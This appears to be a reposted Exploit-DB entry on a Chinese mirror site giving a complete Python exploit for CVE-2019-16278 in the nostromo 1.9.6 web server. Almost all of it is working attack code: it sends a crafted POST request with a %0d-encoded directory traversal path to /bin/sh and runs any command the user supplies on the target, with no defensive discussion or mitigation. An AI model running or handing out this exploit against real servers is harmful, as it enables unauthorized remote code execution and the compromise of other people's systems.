nostromo 1.9.6 – Remote Code Execution - 体验盒子

作者： Kr0ff

日期： 2020-01-01

类别：

remote

平台：

multiple

来源：https://www.exploit-db.com/exploits/47837/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

# Exploit Title: nostromo 1.9.6 - Remote Code Execution

# Date: 2019-12-31

# Exploit Author: Kr0ff

# Vendor Homepage:

# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz

# Version: 1.9.6

# Tested on: Debian

# CVE : CVE-2019-16278

cve2019_16278.py

#!/usr/bin/env python

import sys

import socket

art = """

_____-2019-16278

__________________ _____\\

_____\\_\||| // ||

/ /| || // /|///___/|

/ / /____/||\\\|/||__ |___|/

| | |____|/ \ \\ || | \

| |_____ \| \|| | __/ __

|\ \|\\ |\ /| |\\/\

| \_____\|| | \_______/ | | \____\/|

| | /____/|\ | | /| ||____/|

\|_____||| \|_____|/\|____| | |

|____|/|___|/

"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):

response = ""

try:

while True:

connection = soc.recv(1024)

if len(connection) == 0:

break

response += connection

except:

pass

return response

def cve(target, port, cmd):

soc = socket.socket()

soc.connect((target, int(port)))

payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)

soc.send(payload)

receive = connect(soc)

print(receive)

if __name__ == "__main__":

print(art)

try:

target = sys.argv[1]

port = sys.argv[2]

cmd = sys.argv[3]

cve(target, port, cmd)

except IndexError:

print(help_menu)